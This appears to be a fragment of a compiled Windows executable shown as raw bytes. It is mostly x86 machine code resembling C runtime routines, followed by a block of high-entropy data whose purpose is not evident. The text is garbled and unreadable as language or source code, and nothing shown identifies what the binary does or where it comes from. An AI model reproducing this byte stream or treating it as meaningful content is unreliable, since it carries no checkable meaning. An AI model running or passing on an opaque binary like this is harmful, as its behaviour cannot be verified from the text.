��t��u�E��MԉH;�u�<����MЉH3��M�d�    Y_^[�Ä�tj����Yj�����̡����3����ȅ���Ë�U��E��]Ë�U��V�5����35����΅�u3���u���h���Y^]�jh��@���E�0�  Y�e� �u�v��0�[  YY��t2�F�8 u�� �@���$t��0��  Y���t�F� ��F���E������   �M�d�    Y_^[�� �E�0�R  Y�j,h8���?���E�0�����Y�e� �5������}�u�;�tO��E��7P�   YY��t7�W�O��}��}ĉEȉM̉UЋE��E܉E؍E�P�E�P�E�P�M�������}����E������   �M�d�    Y_^[�� �E�0�t���YË�U��� �e� �E��e� �M��E��E�E�E�j�E�X�E��E�E�P�E�P�E�P�����} �E�u�E��Ë�U��E��t�H������tQ�   ����u	�E� 2�]ð]Ë�U��E$<u�E�u	�E   t�]�2�]Ë�U��MSVW�q����$<uI���tD�9�Y+���a ��~3Q�  �uWSP�y*  ��;�tjX�	���������tj�X�!3�_^[]Ë�U���(�M�VW3�V��t���}��uV�����Y���0�E�PW�f���YY��u�G����tW�  P��!  YY��t����M���t��_��^��j����Yá�Vj^��u�   �;�}�ƣ�jP����j ���������=� u+jV�5������j ����������=� u���^�W3����j h�  �F P������������4��ǃ�?k�8�� ��D���t	���t��u�F������8G��x�u�_3�^Ë�V�'����,  3����4�,  ��Y��� P�������u��5��C����%� Y^Ë�U��E�� P���]Ë�U��E�� P���]Ë�U��QSVW�}���
  �]����   �? u�E����   3�f���   �u�~ u�������F�H�M�����  u#Vh(�SW�u�,  ������   ����   3�9��   u�M����   �f���� f9H}T�F�H��~#;�|3�9E��P�uQWj	�u����������u�F;Xr� t�F�@�E�F�F*   �|���3�9E��P�ujWj	�u���������t�3�@�3҉(��,�3�_^[�Ë�U��E��u�2����    ��t�����]Ë@�]Ë�U��E��@�H|��t�����   ��t�����   ��t�����   ��t��Vj�H(^�y���t	���t���y� t
�Q���t������u����   �L  Y^]Ë�U��QSV�uW���   ��tl=x�te�F|��t^�8 uY���   ��t�8 uP��������   ��  YY���   ��t�8 uP��������   �  YY�v|��������   ����YY���   ��tE�8 u@���   -�   P�������   ��   +�P�������   +�P�w������   �l��������   �   YjX���   �E��~(����t���t�8 uP�4����3�-���YY�E��� t�G���t�8 uP����Y�E��������E�u�V�����Y_^[�Ë�U��M��t���Jt3�@����   @]ø���]Ë�U��V�u��t!���Jt���   ���uV�  V����YY^]Ë�U��M��t���Jt�������   H]ø���]Ë�U��E��ts��H�H|��t��	���   ��t��	���   ��t��	���   ��t��	Vj�H(^�y���t	���t��
�y� t
�Q���t��
����u����   �Z���Y^]�jhX��l8���e� �����xL�����P  t�7��u=j����Y�e� �5��W�=   YY���u��E������	   ��t ��u�j�0���YËƋM�d�    Y_^[������̋�U��V�uW��t<�E��t5�8;�u���-V�0����Y��t�W������ Yu����t�W�����Y��3�_^]Ë�U��V�u����   �F;��tP�����Y�F;��tP�����Y�F;��tP�����Y�F;��tP�����Y�F;��tP����Y�F ;��tP����Y�F$;��tP����Y�F8;��tP�}���Y�F<;��tP�k���Y�F@;��tP�Y���Y�FD;��tP�G���Y�FH;��tP�5���Y�FL;��tP�#���Y^]Ë�U��V�u��tY�;x�tP����Y�F;|�tP�����Y�F;��tP�����Y�F0;��tP�����Y�F4;��tP����Y^]Ë�U��EV�uW�<���6����Y��;�u�_^]Ë�U��V�u����   jV������FjP�����F8jP�����FhjP�������   jP�������   �>������   �3������   �(������   jP�d������   jP�V�����D���   jP�E�����  jP�7�����L  jP�)�����T  �������X  �������\  ������`  ������(^]Ë�U������3ŉE�SVW�u�M���o���]��u�E�X3�3�9E WW�u���u��   PS��������E����   ��E��H;��#�tq=   w��E  ���t���  �P�\�����Y��t	���  ���ƅ�t=�u�WV�lA���u�V�u�ujS�x����ȃ�$�ƅ�t�uQV�u�(��������P�x���Y�}� t
�E䃠P  ��Ǎe�_^[�M�3��5���Ë�U��M3�8t;Et@�< u�]Ë�U��SV�@�  3�W�}��#J�f;�u�   �f��@u�   ��   f;�t�ދǹ `  #�t%=    t= @  t;�u�   ��   ��   �׹   ����%   #�Ћ�#��������   ���  ������_�^[]Ë�U��QSVW�}�   �ǋ؉U�#ڋ����   j ^��   t	;�t�u���E�    �   #�t"=   t=   t;�u�   �	����   �׋ǃ�������Ѓ���������Ћǃ������������E�_�^[�Ë�U��M�   ������#�#�;�t���]Ë�U��� VWjY3��}���u��e��E�%?  P�	����=\���Y}3���]��M�����  Q�6���Y�Ћȃ�?�� �����ы�����?ы�����   ����_�^�á8��Ë�U��SVW3���   �;�+���jU�4�8��u�#  ����ty�^���~;�~Ѓ�����<�_^[]Ë�U��} t�u����Y��x=�   s	��{]�3�]�j
�d��T�3��U�������$�~$�   ��fD$f��f%�f-00f=��B  fЛ�Y�f؛�-��X�f��\�f(���Y�fɁ�v ����?f(-����\���fY��\��Y���\�fxf����\�fY�f\�f(5���Y��\�fY�fY��\�f(�\�fX�X��\��Y�fY��Y�fY�fY�fX-���Y fX5��fY����XX�Y����X�fX�fh�\��\��XHfY��X��X��X��X��X�f��X΃��X�fd$�D$���+f��f%�f����f ��\�fL$�D$���������I ���̀zuf��\���������?�f�?f��^���٭^����n��剕l����ݽ`���ƅp��� ���a�����������$�����  ��؃�PRQ��h�YZX�#�zuf��\���������?�f�?f��^���٭^����n��剕l����ݽ`���ƅp��� �Ɋ�a�����ݽ`����Ɋ�a��������Ŋ�$׊���������$�����
�����  ��؃�PRQ��h�YZX�#�  �ɍ�$    �I �؍�$    ��$    ���   ��������Ð�������t����ؐ����Í�$    �d$ ۽b���ۭb�����i���@tƅp��� �ƅp��� �^�������ɍ�$    ��$    ۽b���ۭb�����i���@t	ƅp��� �ƅp��� ��Í�$    �۽b���ۭb�����i���@t ��۽b���ۭb�����i���@t	ƅp��� �ƅp�����Ð�����-@���p��� ƅp���
�ÍI �����-T�
�t��
�t�f����
�t�����������������������������������ËT$��   ��f�T$�l$é   t�    �����    ËB%  �=  �t�ËB��
  ��D$�B�
�����D$�$�,$��
�    �BËD$%  �=  �tËD$�f�<$t�,$Z�f�$f=tf�� t���f�� t�   ��   Z��,$ZÃ��$�D$��%  �����$�D$��%  �t==  �t_f�$f=t*f�� u!���f�� t�   ��t�{   Z��]   Z��,$Z����������������������   s��������������������������   v���������U�����E��E�E��E�E��	U�����E��]��M�E�M�E�M�E�M�PQR�  ���E�f�}t�m���������������U�������$�~$�   ��fD$f��f%�f-00f=��B  f��Y�f��-��X�f0��\�f( ��Y�fɁ� v ����?f(- ���\���fY��\��Y8��\�fxf����\�fY�f\�f(5���Y��\�fY�fY��\�f(�\�fX�X��\��Y�fY��Y�fY�fY�fX-��Y fX5МfY����XX�Y����X�fX�fh�\��\��XHfY��X��X��X��X��X�f��X΃��X�fd$�D$���I��f��f=�u�YP�fD$�D$���f@��Y��\��YH�fD$�D$����������������̃��$�����   ���R��<$�D$tQf�<$t�)����   �u���=<� ������   �p������  �u,��� u%�|$ u��������"��� u�|$ u�%   �t����-@��   �=<� �?����   �p��8���Z����������������U�������$�~$�   ��fD$f��f%�f- 8f=���  f�f(��fY��-�f(��fX�f(��f\�f-Н�� ) f(%��fYك��Y��fY���f\�fY�������X�f(�f\�f5؝����dfT-��f(��f\�f��^�f\�f(x�\�fY�f\�f(H0fY�f(``fY��X�f(�fY�fX8fXH fY�fX`PfX�f(HpfY�fY�fX�f(H@fY�fX�f(�fY��Y�fY��   fY���fX����Y�f��X�f��X��\��X���f��   f��X��   �Y��X��   �X��X�f=؝�Y�f��   fT��Y��Y��   �\��\��   �\��Y����\��X��\��X��\ǃ��X�fD$�D$���?��f��f=~u���Y �f���Y��X��Y �f\$�D$�����������$    ���̋�U���  ���3ŉE��MS�]V�u������������W�}�� �����u%��t!�(����    ��_���M�_^3�[�'����]Å�tۅ�t�ǅ����    ��r�I��Ή������3�+���@����   ;��'  �7�������Ƌ����;�w/PV���h��Ӄ���~
�Ɖ����������������;�vщ�������;�t;+��߉�������    ��R������B��D��ƈJ���u㋝���������������+ϋ����������;��`����y  ����ǉ�����<0WV�������h��Ӌ� �������������~M������������;�t=���������������I ���+׊
��F��u������������ ����������������P�h��Ӌ��������~I��������������;�t7������+������Ѝ�    ��v�L2��D2��N���u닝���������RW���h��Ӌ���������� ���~5�؋�;�t-��+������Њ�v�L2��D2��N���u닅 ���������������ډ����;�v>���$    �������;�s#������WV�h������������� ���~��B�������������I �;�wWV���h��Ӌ���������� ���~ۋ�������������������$    �� �����+؉����;�vWS���h��փ���ً� �������������������;�rJ��������t++�؊�R�L��D��J���u답����������� ��������;�������������;�s<���������$    +ȉ����;�v!WQ���h��Ӌ���������� ���t��D��������������$    +ȉ����;�vWQ���h��Ӌ���������� ���tՋ�����������ʋ����+΋�+�����;�|=������;�s�������D��������A������������� ���;�sD�����������;�s�������t��������@������������;�s�ϋ� ��������� ������������������v����t��������������������U��Q�MS�]V�uW��u��u9ut(�Y���j^�0�#[����_^[�Å�t�E��t߅�u� 3����u���+ىu��ы����u��B��t܃�u�� ��B��tˋE���t���E�u��u���u����u�EjP�D� X�� �͹��j"�o�����U��]�>���U��V3�PPPPPPPP�U�I �
�t	���$��u���
�t���$s�F��� ^�Ë�U��j �u�u�   ��]Ë�U����} u�Q����    �Z��3���V�u��u�5����    ��Y���9ur3��E�u�M��[���M��V��y tJ9Uw
��Du���+փ�+�J�}� t
�M���P  ���^������3Ʉ�����Ë�U��} u踸���    �Y�����]��uj �5���,�]Ë�U��W�}��u�u�U���Y�$V�u��u	W�
���Y����v%�b����    3�^_]��c�����t�V�;���Y��t�VWj �5���`���t��ҋ�U��QQSVj8j@������3ۉu�YY��u���K��   ;�tAW�~ ��Sh�  �G�P胾���O���g���8�_̍G��G�  

�G�
�_ֈ_�;�uɋu�_S�S���Y��^[�Ë�U��V�u��t%S��   W��;�tW�����8;�u�V����Y_[^]�jhx�����}    r!�b���j	^�0�,X���ƋM�d�    Y_^[��3��u�j�6���Y�u���� ��}�9E|94� �u1������� ���uj^�u��E������   뢡 ���@� �G뻋u�j�$���YË�U��E�ȃ�?��k�8� �P���]Ë�U��E�ȃ�?��k�8� �P���]Ë�U��SV�uW��xg;5 �s_�Ƌރ�?��k�8�� ��D(tD�|�t=�  ��u#3�+�t��t
��uPj��Pj��Pj��\��� ��L�3������� 	   ������  ���_^[]Ë�U��M���u�����  ����� 	   �C��x'; �s����?��k�8�� ��D(t�D]�袵���  譵��� 	   �vV�����]�jh�����3��u�E�0����Y�u��E� �8�����ǃ�?k�8�� ��D(t!W�O���YP�X���u������*����0�6���� 	   ����u��E������   �ƋM�d�    Y_^[�� �u�M�1�B���YË�U���V�u���u����� 	   �Y��xE;5 �s=�Ƌփ�?��k�8�� ��D(t"�E�u��E�M��E��u�P�E�P�E�P������菴��� 	   �XU�����^�Ë�U��j�h�hd�    P��t���3ŉE�SVWP�E�d�    �E�Ћu��?�]k�8���u��]ĉU��� ��M��D�E��EƉE��P��{ �E�u���ʏ���C�u���@�E�3�����E��ЉU�;E��  �}�3ۉ]��}���  ��EϋE��]��E�   �� ��M��4  ��.���8t@A��|��}�+��Eԅ���   �E��M���.��E�� ����@�E�+EԉE�;��  �Mԋ��u���D=�GF;�|�}���~W�E��RP��!���Mԃ��}��Ӌu��� �ǈ\.B;�|��uċu�E�E��M�3��]��}�Q���]�@P�EԍE�P�E�P��
  ������  �E�E��U�����A�M�;���  �u�3��]����]��M��U���@QP�EԍE�P�E�P�
  �������  �E�E��}�H�   �d-��t�D.����uĈE���E�d-�E�jP�F�E��
�@� f9H}/�B�E�;E��?  �učE�jRP����������M  �E���u�jR�E�P����������-  �E�SS@j�EЍE�P�uԍE�PS�u��u����� �Eȅ��   S�M�QP�E�P�u��T�����   �UЋ�+M��F��E��F�E�9E���   �}�
u<jXSf�E��E�Pj�E�P�u��T�����   �}���   �F�F�F�UЉE�;U��o����y��~&�EЋuԋU��� �ъ�C�L2.�M�;�|�u~�J��~��u��E��� ��ΈD.C;�|��׋E��
�L.�E��� ��L8-�E�@�F������ƋM�d�    Y_^[�M�3��W��������̋�U��QSV�u3�W������}�EǉE�;�s?�S�q  Yf;�u(�F��
uj[S�Y  Yf;�u�F�F��;}�r������_��^[�Ë�U��QSV�uWV�U  Y��t`����?��k�8�� ��|( }G�u�~ u���ɋ���F���    u�� ��|) t�E�P�� ��t�L���t��2�_^[�Ë�U��  ������3ŉE��M���U��?��k�8S�]�� �VW���D�Mщ�����3����������;�ss������������;�s�A<
u�C�F�F�E�;�r䍅�����M+�������j PV������PW�T���t������C;�r�M������;�r�������M���_^3�[����Ë�U��  �1�����3ŉE��M���U��?��k�8S�]�� �VW���D�Mщ�����3�����������u������;�s%�����
u�Cj_f�>��f����E�;�r׋�����������+��Mj ���������PV������PW�T���t������C;�r�M������;�r�������M���_^3�[����Ë�U��  �H�����3ŉE��M���U��?��k�8SV�� ��uW���D�M�������3������������;���   ��������P���;�s!�����
u	jZf���f����M�;�r�j j hU  ������Q��P���+���P��Pj h��  ������u�� ��������tQ3ۅ�t5j ������+�QP�������P�������T���t&�����������;�rˋ�+E�F;������F���������M���_^3�[�v����jh�������u���u�E�@$�`  �@�@	   ��   ����   ;5 ���   �����ƃ�?k�8�M��� ��D(toV����Y����}�3ɉM��� ��U��D(u�E�@�@	   �@$�H ��u�u�uV�^   �����}��E������
   ���6�u�}�V�G���YËEP3�QQQQQ�@$�H �@�@	   �5L��������M�d�    Y_^[�Ë�U���0�M�E�E��M�S�]VW�}����  ��u*3��C$SPPP�C P�CP�C   ��K��������  �ǋ���?��k�8�u��� ��EЉU�D)�E�<t<u���Шt��E�3��D( tSjVVW��  ��SW�����YY��t@�E���t#��<�  �u�E��u�P�N��������   S�u�E��u�WP�a�������E��� ��E�|( }O�E�+�t5��t����   �u�E��u�WP��������u�E��u�WP�������u�E��u�WP�����׋L�}�3��V���E�P�u��u�Q�T���u	����Eԍuԍ}॥��E��uh�E���t,jY;�u�C�C	   �C$�K ����SP�٩��YY����3��E��M�� ��D(@t�E��8t�C�C   �C$�s �W���+E��3�_^[��jh�������e� j譶��Y�e� j^�u�;5�tY������tJ�@���$t���4���  Y���t�E������ P������4�����Y���$� F��E������   �E�M�d�    Y_^[��j�c���YË�U��V�uW�~�����t%�����t�v菫��Y������!3��F��F_^]Ë�U��M���u�˨��� 	   �8��x$; �s����?��k�8�� ��D(��@]�薨��� 	   �_I��3�]Ë�U��M�9 u3�@��y ujX�3�8A����]� ��U��Q�u�E��u�u�uP�(  �Ѓ���w�M�����  v���  �E��tf����Ë�U��QQ�} SVW�}�?��   �]�u��tkW�M��e����u�uP�E�WP��  �Ѓ����t^��tQ�M�����  v+��v3��   K���M���
���   �  f����� �  f������u��]+u���;���g3�3�f���E�8�E�@�@*   ����FW�M�3�������]���tǃ�uF��M�WF����S�uPWj �  �����u��C�C*   _^[�Ë�U��M��u3�]�S�]VW�}���B���w�� �3���F���w�� ��+�u	��t��u�_^[]Ë�S��QQ�����U�k�l$���   ���3ŉE��CV�sW���|������t)��t ��t��t��t��ulj�j�
j�j�j_Q�FPW��  ����uG�K��t��t��t�e����E��F�����]��E��FP�FPQW��|���P�E�P�!
  ��h��  ��|����  �>YYt�"�����tV�?���Y��u�6�  Y�M�_3�^�b����]��[á@�Ë�U��QQV�uWV�������Y;�u�E�@�@	   �ǋ��Q�u�M�Q�u�uP�H���u�u���P�%���YY�ϋE��U�#�;�tËE��΃�?��k�8�� ��d1(�_^�Ë�U���u�u�u�u�u�d�����]Ë�U��Q�:  ��t�E�P�EjP�]  ����tf�E�ø��  ��jh�������u�u���u#�E�@�@   P3�WWWWW�E��������@�F���$Vt�(  Y��3��}������Y�}��uV�3   YY���}��E������   �ǋM�d�    Y_^[�Ëu��}�V����YË�U��V�u��u#�EP�@�@   3�PPPPP�vD��������[�FW�������tB�uV�v���V����������uV����YP�5  YY��y�����~ t�v�f����f YV�T  Y��_^]Ë�U���(�M�Vj �nA���E�P�u����YY�M؋��A����^���������������̃=T� t2���\$�D$%�  =�  u�<$f�$f��f���d$u�  ���$�r����   ��ÍT$����R��<$tL�D$f�<$t�-���  �t^�   �uA������=<� �<���� ��   �9����   �u�ԩ�� u�|$ u%   �t����-@��   �"�������� uŃ|$ u����-:��   �=<� ������ ��   �����ZÃ=T� ��  ���\$�D$%�  =�  u�<$f�$f��f���d$��  � �~D$f(@�f(�f(�fs�4f~�fT`�f��f�ʩ   tL=�  |}f��=2  f�L$�D$�f.�{$��  ���T$�ԃ��T$�T$�$�x������D$��~D$f��f(�f��=�  |%=2  �fT0��X�f�L$�D$��p��f�P�fT0�f�\$�D$Ë�U��E�  �` �E]Ë�U��E�  �` �E�@�@*   ���]Ë�U���(���3ŉE��M�ES�]V�u�M��E�W��u�D�3�3�B��u7��5�}؋M�E3�f9Fux�A�M��x1��t�É3������?  ���M����#��} �}�u�j�X�#  ��$�<�u����$�<�u����$�<���   �j��Y+Ȉ}����J��#��%�~��ǊN,<��   ����   :���   ���E܋E9E�s�E܉E�}�+}��}�;��}�s'�E�@�E��E��$�<�u~�Ã�?��ЋE9E�r�;E�s��f�F�E*����f�F�,����� �  r����  v<���� w4���E��   �E�   �E�   ;T��r��t���V�#U�R�(����	�u�V�1���YY�M�_^3�[� ���Ë�U��E� tj��t3�@]ètj��tjX]������]Ë�S��QQ�����U�k�l$���   ���3ŉE�V�s �CWVP�s�   ����u&�e��P�CP�CP�s�C �sP�E�P�
  �s ���s�^���Y���������t)��t%�CV���\$���\$�C�$�sW��  ��$�W�  �$��  V�  �CYY�M�_3�^�����]��[Ë�U���$3�AS�]V�����t�MtQ�w  Y����*  ��#E�tj�^  Y����  ����   �E��   j�<  �EY�   #�tT=   t7=   t;�ub�M����������{L�H�M�������{,����2�M�������z�����M�������z��������������o  ���f  �E�\  �EW����� #�����}�����D�/  �E�PQQ�$�O  �U���� ����U��������}
3���@��   ������Au�E�   �E��	�e� 2��E��E�2Ƀ��E� ���M�f�E����;�}B�}�+}܋]��σ��M�t	��uC�E����E��}�t	��   ��}��m���uщ]��]��}܃}� �E�t���U��U܋}���U���u8M�tK��������t=   t=   u/�E�4��E�����}� t�}� u�E�t���}܃U� �E���E��E��M���t���j�I  Y���_��t�E tj �2  Y���3���^��[�Ë�U��j �u�u�u�u�u�u�   ��]Ë�U��E3�S3�C�H�EW�  ��H�E�H�M��t�E��  �	X��t�E��  ��H��t�E��  ��H��t�E��  ��H��t�E��  ��H�MV�u�����3A��1A�M����3A��1A�M�����3A��1A�M�����3A��1A��M����3A#�1A�z  ����t�M�I��t�E�H��t�E�H��t�E�H�� t�E	X��   #�t5=   t"=   t;�u)�E��!�M���������M��������E� ���   #�t =   t;�u"�E� ���M�������M�������E�M��3���� 1�E	X �}  t,�E�` �E� �E�X�E	X`�E�]�``�E��XP�:�M�A �����A �E� �E�X�E	X`�M�]�A`�����A`�E��XP�  �EPjj W����M�A�t�&��A�t�&��A�t�&��A�t�&�A�t�&ߋ��������� t5��t"��t��u(�   � �%����   ���%����   ��!������� t��t	��u!��#�   �	�#�   ��}  ^t�AP���AP�_[]Ë�U��E��t�����w謘��� "   ]�蟘��� !   ]Ë�U��M�� 3�9�x�t'@��|�e� h��  �u(�   �u�����E ���Ë�|��E��tՋE�E�E�E�E�E��EV�u�E�E h��  �u(�E��E$�u��E��.   �E�P�s�������uV�8���Y�E�^�Ë�U��Q�}����E��Ë�U��QQ��}��M�E��f#M�#Ef�f�M��m��E��Ë�U��M����t
�-���]����t����-���]�������t
�-��]����t	�������؛�� t���]���Ë�U��Q��}��E�����������U��WVS�M�tM�u�}�A�Z� �I �&
�t'
�t#����:�r:�w�:�r:�w�:�u��u�3�:�t	�����r�ً�[^_��3�PPjPjh   @h��D����Ë�����u��������3������á�����t���tP�@�Ë�U��Vj �u�u�u�5���0�����u-�����u"�����s���V�u�u�u�5���0�����^]�jh��Y����e� �E�0�H���Y�e� �M��8�q�����ǃ�?k�8�� ��D(tVW��   YY����F�F	   ����u��E������   �ƋM�d�    Y_^[�� �u�E�0�����YË�U���V�u���u�E�`  �@$�@�@	   �t��xK;5 �sC�Ƌփ�?��k�8�� ��D(t(�E�u��E�M��E�E��E�P�E�u�P�E�P������(�E3�PQQQ�@$Q�H �@Q�@	   �l5�������^�Ë�U��VW�}W�����Y���u3��N� ���u	���   u��u�@`tj�����j������YY;�t�W����YP�@���u������W����Y�σ�?��k�8�� ��D( ��t�uV�B���YY����3�_^]Ë�U��E3ɉ�E�H�E�H�E�H��E�H�E�H�E�H�E���]�������U�������$�~$�   ��fD$�    f(�f�fs�4f�� f(0�f(@�f(��f(%P�f(5`�fT�fV�fX�f�� %�  f(���f(���fT�f\�fY�f\��X�fY�f(�fXƁ��  �����  ��   ���  ��*�f���
��   �    �� D�f(�f(�f( �fY�fY�fX�f(��Y�f(-p�fY�f(���fT�fX�fX�fY��Y�fX�f( �fY�f(�f�fY˃�f(�fX�f��X��X��X�fD$�D$���fD$f(����� f�� �� wH���t^���  wlfD$f(0�f(��fT�fV���� f�� �� t�ؠú�  �Of���^�fР�   �4f���Y���������������  ���  s:fW��^ɺ	   ��fL$�T$�ԃ��T$���T$�$裛���D$���fT$fD$f~�fs� f~с��� ��� t���  릍�$    ����ƅp����
�uJ�������$    ��$    �ƅp����2������+  ������a���t������@u��
�t�������F  �t2��t���������������������-0�ƅp����������ݽ`������a���Au����ƅp������-:��
�uS��������
�u�����q�����   ����
�u���u
�t���ƅp����-0���u�
�t��������"����������X��ݽ`������a���u���-0�
�t���ƅp�������������-0�ƅp����
�u����-0�������-N��ٛݽ`������a���Au�������ݽ`������a���������ݽ`�������������ٛ���u���b������ٛ���t�   ø    ���   ��V��t��V���$���$��v�  ���f���t^��t����Ë�U��QQSV���  Vh?  �����E��YY�M��  #�QQ�$f;�u=�z  HYY��wVS�f����E�a�E��dS�����\$�$jj�������?�.  �U��E��������D{�� uS�����\$�$jj��V��S�������E�YY^[�Ë�U���E������V��Dz	��3��   Wf�}�ǩ�  uz�M�U���� u��th�پ�����S3���AuC�EuɉM��y���M�N�Et�f�}�U���  f#�����f�}[t	 �  f�E�Ej QQ�$�1   ���#j Q��Q�$�   ���������  ���  _�E�0^]Ë�U��QQ�M�E�E%�  �]����  ���f�M��E��Ë�U��}  ��Eu��u@]Á}  ��u	��ujX]�f�M��  f#�f;�uj���  f;�u�E�� u��tj��3�]Ë�U��QQ�EQQ�$�  YY��uJ�EQQ�$�l  �E����YY����Dz+�ЩQQ�U��$�I  �E�����YY��DzjX��3�@����3��Ë�U���E�  ���  ��9Mu;�} uu��������z���������   ��������A�E��   ������   9Eu;�} u5��������z�������   ��������A�E��   ������   ��9Mu.�} ��   ���E������A�s����������E{b�����\9EuY�} uS�EQQ�$�������EYY�ы�����Au���������u ���������z��u����������E�3�]Ë�U��QQ�E���]��E��Ë�U��f�M��  f��f#�f;�u3�EQQ�$�����YY��t��t��t3�@]�j�jX]ø   ]��Ɂ� �  f��u�E�� u�} t��Ƀᐍ��   ]��E��������Dz��Ƀ���A@]���Ɂ������   ]��������������U��E3�SVW�H<��A�Y�����t�}�p;�r	�H�;�r
B��(;�r�3�_^[]��������������U��j�h8�h`bd�    P��SVW���1E�3�P�E�d�    �e��E�    h   �|   ����tT�E-   Ph   �R�������t:�@$���Ѓ��E������M�d�    Y_^[��]ËE� 3Ɂ8  �����Ëe��E�����3��M�d�    Y_^[��]�������U��M�MZ  f9u�A<��8PE  u�  f9Hu�   ]�3�]ËM�d�    Y__^[��]Q�Pd�5    �D$+d$SVW�(�衔�3�P�u��E������E�d�    �Pd�5    �D$+d$SVW�(�衔�3�P�e��u��E������E�d�    �V�D$�u(�L$�D$3���؋D$������d$�ȋ��d$��G�ȋ\$�T$�D$���������u�����d$�ȋD$���r;T$wr;D$v	N+D$T$3�+D$T$���؃� �ʋӋًȋ�^� ����������̋D$�L$ȋL$u	�D$��� S��؋D$�d$؋D$���[� �����������̀�@s�� s����Ë�3������3�3��̀�@s�� s����Ë�3Ҁ����3�3���SV�D$�u�L$�D$3���؋D$����A�ȋ\$�T$�D$���������u�����d$�ȋD$���r;T$wr;D$vN3ҋ�^[� ��������Q�L$+ȃ����Y����Q�L$+ȃ����Y��������U��Q�=\�|f�}� �t	�}� �uT�]��E���?��t?�  u��  ��é  t*�  u��  ��é  u��  ��é   u��  ��ø�  ��ËE���������̐��D��a������̐��$��Q������̍M��h�������̐��P��4���������̋M���������̐�� �����������̍M��x����M��P����M��H����M��@�����|����5�����d����*�����L���������4�������������	����������������������������������������������������������������������t���������\���������D���������,���������������������������������z����������o����������d����������Y����������N�����l����C�����T����8�����<����-�����$����"�������������������������������������������������������������������|����������d����������L���������4����������������������������������������������������}����������r����������g�����t����\�����\����Q�����D����F�����,����;���������0����������%���������������������������������������������������������l����������T����������<����������$������������̐��ܮ�^���̍M�������M������M������M������M�������l����}�����T����r�����<����g�����$����\���������Q�������̐��h�������M����������̐��������������̍M��8����M������M������M�� �����l����������T������������̐��4�������������̍M�������M�������M�������t���������\���������D���������,�����������������������v����������k����������`����������U����������J����������?�����l����4�����T����)�����<���������$�������������������������������������������������������������������������|����������d���������L���������4������������������������������������������y����������n����������c����������X�����t����M�����\����B�����D����7�����,����,���������!������������������������������ ��������������������������������������l����������T����������<���������$�����������������������������������������������������|����������q�����|����f�����d����[�����L����P�����4����E���������:���������/����������$����������������������������������������������t����������\����������D����������,��������������������������������������������������������������������������������l����t�����T����i�����<����^�����$����S���������H����������=����������2����������'�������������������������|���������d����������L����������4���������������������������������������������������������������̐����J���������������̍M���������̐����$���������̍M������M��`����M��X�����t����M�����\����B�����D����7�����,����,���������!�����������������̐������������̍M������M�������M�������M�������M��������h����������P������������̐��@��^���̍������������������������������(���������T����y�����l����n����������c����������X����������M����������B����������7����������,���������!�����,���������D���������\���� �����t��������������������������������$����������<����������������������������������������d������������������,���������D����|�����\����q�����t����f����������[����������P����������E����������:����������/���������$��������������4���������L���������d����������|�������������������������������������������������������������������������$���������<���������T���������l��������������t����������i����������^����������S����������H����������=���������2�������̐���������̍�x���������`����
����M��"����� ������������������������������������������������������������������������������������ ������������������0���������H����~�����`����s�����x����h����������]����������R����������G����������<����������1���������&����� ���������8���������P���������h������������������������������������������������������������������������������������(���������@���������X���������p��������������v����������k�������̐�����������������̍�����E�����`����:�����x����O����M��G����M��?����M��7�����P���������h�����������������������������������������������������������������������������������(���������@���������X���������p��������������}����������r����������g����������\����������Q����� ����F���������;�����x����0����������%����������������������������������������������������������������������ؿ���������Ϳ���������¿�������鷿���� ���鬿����8���顿����P���閿����h���鋿��������逿���������u����������j����������_����������T����������I���������>�����(����3�����@����(�����X���������p�������������������������������������������������������۾���� ����о��������ž����0���麾����H���鯾����0���餾����H���陾����`���鎾����x���郾������̐��������̍�0����e����� ����Z�����X����o�����L����d����������9����������.����� ����#�����p�������������������X���������x�����������������������������������ֽ���������˽������������������鵽���� ���骽����8���韽����P���锽����h���鉽���������~����������s����������h����������]����������R����������G���������<�����(����1���������&�����0���������H�����������̐��ظ������������������̍�T���������l����ڼ���M������M������M������M��ڼ��������鯼��������餼��������陼��������鎼��������郼��������x���������m�����4����b�����L����W�����d����L�����|����A����������6����������+���������� ��������������������
���������������$����������\�����������̐��������������̍������Ż��������麻���M��һ����x����ǻ���M�鿻���M�鷻��������錻��������遻���� ����v���������k�����0����`���������U����� ����J�����8����?�����P����4�����h����)����������������������������������������������������������������������ܺ����(����Ѻ����@����ƺ����X���黺������̐����W������T$�B�J�3���������:������T$�B�J�3���������������T$�B�J�3��l����D�� ������T$�B�J�3��O����$���������T$�B�J�3��2����P���������T$�B��|���3������J�3������D��������������������U��X��ӹ��]��U�칈������]��U��P�賹��]��U�칰�裹��]��U��0�蓹��]��U���胹��]��U�침��s���]��U��x��c���]��U��8��S���]��U��H��C���]��U�����3���]��U�� ��#���]��U�칐�����]��U��������]��U�� �����]��U��������]��U�����Ӹ��]��U�칀��ø��]��U��`�賸��]��U�치�裸��]��U��h�蓸��]��U����胸��]��U����s���]��U����胸��]��U����s���]��U����c���]��U����S���]��U��(��C���]��U��������]�                                                                                                                                                                                                                                                                                       @ P � �  @ p � �   p � �   0 ` � � �   � P p � � � 0           �"�          ��D�                `  �L  �*  �  ��  �% Q8  ��  �  .  C�  jW  K�  o! ��  c
  �c     � ��  �l      8;"xBcv,I%5],68lN}n!8&W^IU"0/8 &	;.2*&%
7)
1l'# 
'-13/yU5+x=u.20`.'=?/((%$-:<(04,|5~8>* .)
9>2%-)"/5+:'!r8=:S5:;= ?J	%'3-V.
))(!2	&,(<0
-16:b6u,;Ch#/$) 08fzJVvkYkV%B
b"f*g1!5KfM~d0X3]Q	 3?;vVWZ5']g+Y'b*!(3 [jk{"aIS6w 2$4##)GdiX3b?}r
116%A8`?\JVvk7.:>dF 
e_MJ-%2~~"Q.u 81_gXD/"6;,%
+)4' )8,#z)=7._J$ <Z?T!/3 -6"	,8		-2e8dC_w1d	7I>zJVv+:>#	XE e_MJZ (#3,G>087$gXZw2x^VO57aCbx8Xw.30 
%s
53/=%69;\zDL(/:m$ 0r'2<r<4!=`i3 cIGGpd6053.+Dcd}Ig6*'-GS(CnjK!f?-Zh7VAXZaLM53aCbxt7>!+.H75.7E$KPy7|h@\X6.,Ar%di\v 2 _w{
}	T3z&a6}*2
hd`S?*))z $"*%+<)9EGe_MJ-/ Qt{f?-3]|N_gOC/&vI>V  !5; |a`=[I)7#0Ag,NHgU|t86c%/
7G/ 696?}r`
+16a6qd_(`q,$I#z#k{c\}=2	64=0
?9.% (,Y00!Q	XLxTA7<5;c%us,(:/;<F(',uA1 
.72U' #
\6"((+ dt! h;;4<*859,?(}1 $,I6Y}-5\}=N5 B4	5u<		`':4<Yr804>'\c]{k.4# 0uH9 xVN
